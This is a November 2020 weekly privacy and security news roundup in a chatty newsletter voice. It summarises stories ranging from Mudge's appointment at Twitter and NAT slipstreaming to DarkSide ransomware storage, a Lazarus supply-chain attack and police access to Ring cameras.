Privacy and Security related news for the week ending 2020 11 17

Hiya DAML’ers!

How many of you think back to the days of L0phtcrack as possibly one of the first tools you used to demonstrate the concept of brute force attacks? (Ok maybe this says something about us) Well, Twitter has just taken on its creator.

This week is absolutely the best collection of articles yet, … as we veer from Pentagon commissioned artwork, to numbers that give us an idea why there are so many data breaches … to a new scam involving browser notifications.

We update you on Raas and the new DS4SD, take a trip to Pluton, the benefits of Glue DataBrew and a wonderful story about how one Bangladeshi lad is tackling cyberbullying and receiving international acclaim for it.

We end with a sad story for one person in particular and the perfect example of how not to use your vacation time.

You’re going to both love and learn with this weeks set of adventures, so let’s get going! Listen or read along.

Twitter names famed hacker ‘Mudge’ as head of security

Social media giant Twitter, under increased threat of regulation and plagued by serious security breaches, is appointing one of the world’s best-regarded hackers to tackle everything from engineering missteps to misinformation.

Twitter named Peiter Zatko, widely known by his hacker handle Mudge, to the new position of head of security, giving him a broad mandate to recommend changes in structure and practices.
Zatko answers to CEO Jack Dorsey and is expected to take over management of key security functions after a 45- to 60-day review.
Zatko most recently oversaw security at the electronic payments unicorn Stripe. Before that, he worked on special projects at Google and oversaw handing out grants for projects on cybersecurity at the Pentagon’s famed Defense Advanced Research and Projects Agency (DARPA).

Zatko’s colorful career began in the 1990s, when he simultaneously conducted classified work for a government contractor and was among the leaders of Cult of the Dead Cow, a hacking group notorious for releasing Windows hacking tools in order to goad Microsoft into improving security.

“I don’t know if anyone can fix Twitter’s security, but he’d be at the top of my list,” said Dan Kaufman, who supervised Zatko at DARPA and now leads the advanced products group at Google.

Some Apple Apps on macOS Big Sur Bypass Content Filters, VPNs

“We found out that traffic from about 50 Apple processes is excluded from being seen and controlled by NEFilterDataProvider"

Apple’s NEFilterDataProvider is used by application firewalls and VPNs to filter traffic on an app-by-app basis. Bypassing NEFilterDataProvider makes it hard for VPNs to block Apple applications. Worse, researchers say the bypass can leave systems open to attack. “Maps for example can directly access the internet bypassing any NEFilterDataProvider or NEAppProxyProviders you have running.”

The VPN and firewall bypass isn’t the only problem being reported by users of Big Sur. A report in MacRumors based on user posts on one of its forums that claim that “a large number of late 2013 and mid 2014 13-inch MacBook Pro owners” reported that the OS is bricking this machines. Similar reports were found across Reddit and Apple Support Communities, according to the report.

US: A new take in artwork from the Pentagon.

It all began when Cyber Command, the U.S. Department of Defense’s offensive cyber arm, started working with a graphics company to illustrate foreign government hackers. The military realized it could punch up the reports it releases on foreign hacking operations by adding illustrations, and try to embarrass or infuriate the foreign hacking shops.
So instead of burly, ferocious, macho bear images and names like Fancy bear (which the hackers actually made into t-shirts to wear proudly) they lit up images of fumbling, bumbling endearing bears set to drive their management mad.

This is not a new strategy. When cyber command wanted to highlight the lazy coding techniques of suspected Chinese Gov’t. malware, the media company came up with a sloth in headphones crawling on a laptop!

This is a fairly new initiative, but it will interesting to see what the design company comes up with for the hacking teams in Iran and North Korea.

Why all the browser updates over the last 2 weeks? Put it down to Sammy Kamkar’s demo of NAT slipstreaming.

So what happens? A naughty piece of code in an ad is clicked on. The victim executes that javascript which allows the attacker to access any TCP/UDP port despite the NAT (network address translation being performed at the gateway) allowing the attacker to return on any alternate, arbitrary port.

It works because the attack leverages the fact that NAT devices scanning port 5060 to create port forwarding rules detect the requests camouflaged as valid SIP requests and allow them to use any port they want.

So browser makers said, “As a workaround for the ‘Slipstream’ NAT bypass attack, we will be blocking HTTP and HTTPS connections to the SIP ports 5060 and 5061.” Which meant that any app. using those 2 ports will fail, not many do, and that your browser needed an update.

According to new research: Corporate Employees Have Access to an Average of 10 Million Files

“It does not come as a surprise that we continue to see the leakage/breach of personal data year-over-year.” The average employee has access to around 10.8 million files, with larger organizations having around 20 million files accessible.

Many business owners don’t restrict access to sensitive data. “They don’t because there are a few steps you need to take to ensure it is actually restricted. These steps can be daunting but they are critical to success in cyber.

  • First, you need to classify all your data and determine prioritization relative to risk.
  • You then need to ensure that identity of users is organized and limited.
  • The third, and most crucial step, is to put controls in place that limit access to and manipulation of high priority data by specific users. This does not only solve the challenge of users stealing or mishandling data, but will drive efficiency and security in several other areas."

Watch what sites you allow to provide notifications.

several dodgy firms are paying site owners to install their notification scripts and then selling that communications pathway to scammers.

many users may not fully grasp what they are consenting to when they approve notifications, or how to tell the difference between a notification sent by a website and one made to appear like an alert from the operating system or another program that’s already installed on the device.

This is evident by the apparent scale of the infrastructure behind a relatively new company based in Montenegro called PushWelcome, which advertises the ability for site owners to monetize traffic from their visitors. The company’s site currently is ranked by as among the top 2,000 sites in terms of Internet traffic globally.

Website publishers who sign up with PushWelcome are asked to include a small script on their page which prompts visitors to approve notifications.

Approving notifications from a site that uses PushWelcome allows any of the company’s advertising partners to display whatever messages they choose, whenever they wish to, and in real-time. And almost invariably, those messages include misleading notifications about security risks on the user’s system, prompts to install other software, ads for dating sites, erectile disfunction medications, and dubious investment opportunities.

If you would like to stop push notifications, the Verge provided a good overview in an article from 2019.,requests%20asking%20to%20allow%20notifications.”

RU: Ransomware Operator Promotes Distributed Storage for Stolen Data (DS4SD)

News last week about a ransomware-as-a-service (RaaS) operation called DarkSide setting up a distributed storage system in Iran for storing data stolen from victims of its attacks could mean big trouble for organizations.

If the model proves successful, other ransomware operators are likely to implement similar systems, making it even harder for defenders to prevent crooks from leaking sensitive corporate data stolen in ransomware attacks.

The first advertisement on Nov. 11 proclaimed plans by the DarkSide group to create a distributed storage system that customers (or so-called affiliates) of its ransomware services could use to store data stolen from victims. “We are already working on a sustainable storage system for your data,” the advertisement noted. “All your data will be replicated between multiple servers, blocking one server won’t delete data.” The advertisement guaranteed affiliates that stolen data would be stored for a minimum of six months.

In this context, affiliates are criminal groups that use a RaaS offering such as DarkSide to target organizations, launch attacks, and extract money from victims. As developers of the service, operators like DarkSide get to keep a substantial cut of the ransom.

Microsoft Unveils ‘Pluton’ Security Processor for PCs

Pluton, a new security chip for Windows PCs that the tech giant will deliver through partnerships with Intel, AMD and Qualcomm.

PCs currently use the Trusted Platform Module (TPM) to store encryption keys and data needed to ensure the integrity of the system, but this data is still exposed to attacks while passing through the communication channel between the TPM and the CPU, particularly if the attacker has physical access to the targeted system.

Pluton aims to address this by storing encryption keys and other sensitive data within the processor, thus eliminating the exposure of that communication channel and providing protection against speculative execution and other types of attacks.

Updating Google Photos’ storage policy to build for the future

Build user dependency. Check. Put competition out of business. Check. Google Photos is ending its unlimited free storage policy for photos and videos, Google said in a Wednesday blog post. After June 1, 2021, any new photos and videos you upload will count toward the free 15GB of storage that comes with every Google account.

This comes as tightening of data privacy laws most probably mean that Google has less means to monetize the data from your photos, but it also could tie into the fact that each year we take and store more photos than all the photos taken in the history of the world prior to the start of that year.

Teen Wins Peace Prize for Fighting Cyber-Bullying

Sadat is a 17-year-old boy from Bangladesh. A story about a 15-year-old girl who committed suicide after suffering from cyberbullying moved Sadat so much, that he founded his own organization and created the anti cyberbullying app ‘Cyber Teens’ to give helpless teenagers a place to go for help. One of the major issues around cyberbullying is that young people are afraid to report it to the police or to inform their parents. The app gives young people information about internet safety and gives them the possibility to report cyberbullying.

Rahman’s Cyber Teens app has been downloaded over 1,800 times and has supported 300 young victims of cyber-bullying.

Rahman’s win came with $118,000 in prize money that he intends to use to roll out the app across Bangladesh and to other countries.

Glue DataBrew: Interesting new service to clean data.

AWS Glue DataBrew is a new visual data preparation tool for data analysts and data scientists to clean and normalize data to prepare it for analytics and machine learning. You can choose from over 250 pre-built transformations to automate data preparation tasks. You can automate filtering anomalies, converting data to standard formats, and correcting invalid values, and other tasks. After your data is ready, you can use it for analytics.
We think it could be a great way to remove sensitive information from data collections or even to verify the content of what you are pulling in.

Mississippi Program to Use Door Cameras to Fight Crime

Jackson Miss. began a pilot program with two technology corporations to provide a platform for the police department to access private surveillance via Ring cameras.

“Ultimately, what will happen is residents and businesses will be able to sign a waiver, if they want their camera to be accessed from the Real Time Crime Center. It would save (us) from having to buy a camera for every place across the city.”

“We’ll be able to get a location, draw a circle around it and pull up every camera within a certain radius to see if someone runs out of a building. We can follow and trace them.”

The equipment needed to allow the center access to cameras is being provided by corporations Pileum and Fusus: Pileum, an information and technology consulting company founded in 2002, is based in Jackson, according to its website. Fusus, a Georgia-based company, provides cloud services to allow real-time crime centers to extract video information.

Why does this idea scare us so much?

***Hacked Security Software Used in South Korean Supply-Chain Attack

In this attack the Lazarus Group, notorious for its 2014 Sony Pictures Entertainment hack, exploits security software made by Wizvera. The software, called Wizvera VeraPort, is used by South Korean government websites and requires visitors to use a VeraPort browser plug-in for identity verification.

“To understand this novel supply-chain attack, you should be aware that South Korean internet users are often asked to install additional security software when visiting government or internet banking websites.”

Once attackers achieve a foothold on a targeted server, malicious binaries that appear to be legitimate and use the stolen digital certificates are planted on a compromised website and pushed automatically to unsuspecting site visitors.

The next stage delivers the Lazarus remote access trojan. Commands include operations on the victim’s filesystem and download additional tools from the attacker’s arsenal, researchers wrote.

Exposed Database Reveals 100K+ Compromised Facebook Accounts

The unsecured Elasticsearch database was 5.5 gigabytes and contained 13,521,774 records of at least 100,000 Facebook users. It was open between June and September of this year; it was discovered on Sept. 21 and closed on Sept. 22.

The data in the exposed database included credentials and IP addresses; text outlines for comments the fraudsters would make on Facebook pages (via a hacked account) that directed people to suspicious and fraudulent websites; and personally identifiable information (PII) data such as emails, names and phone numbers of the Bitcoin scam victims.

The global scam targeting Facebook users starts with a network of websites owned by fraudsters, which trick Facebook users into providing their credentials by promising they would show targets a list of people who had recently visited their profiles.

The website tells victims “There were 32 profile visitors on your page in the last 2 days! Continue to view your list,” and points them to a button that says “Open List!” When the victim clicks on the button, they are sent to a fake Facebook login page, where they are asked to input their login credentials.

US gov’s CISO takes leave to help Trump search for election fraud

The US government’s chief information security officer (CISO) is taking time off from his official duties to help in President Trump’s search for election fraud.

Camilo Sandoval worked on Trump’s 2016 campaign and has been the federal CISO, a position in the White House’s Office of Management and Budget, since October of this year. But Sandoval is now spending his days working for the newly formed Voter Integrity Fund, which is reportedly “run by government employees and former Trump campaign staffers who are analyzing voter data in six key states,” and will, according to a Trump tweet find evidence that “Radical Left Democrats” are partnering with “the Fake News Media” to “STEAL this Election.”

In an interview on Friday, Sandoval defended his involvement in the endeavor as appropriate, saying he had taken vacation time from his government position, which he started last month. He said he was not using any government resources, such as his work computer or cellphone, while searching for fraud.

Just what anyone would like to do on their vacation time off.

Stay safe, stay secure, and see you next week!